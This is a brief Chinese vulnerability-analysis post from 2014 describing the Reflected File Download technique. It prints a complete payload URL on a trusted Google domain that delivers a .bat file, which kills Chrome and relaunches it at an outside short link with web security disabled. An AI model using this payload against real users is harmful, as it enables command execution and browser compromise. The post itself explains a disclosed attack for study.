2014-10-31 Reflected File Download - A New Web Attack Vector
提交作者: qiaoy 所属分类: 漏洞分析
在可信域名构造恶意下载,代码如下:
https://www.google.com/s;/ChromeSetup.bat;/ChromeSetup.bat?gs_ri=psy-ab&q="||taskkill /F /IM ch*|md||start chrome pi.vu/B2jk --disable-web-security --disable-popup-blocking||
可直接执行系统命令或重置chrome,进入非安全模式,进行各种攻击。
简评
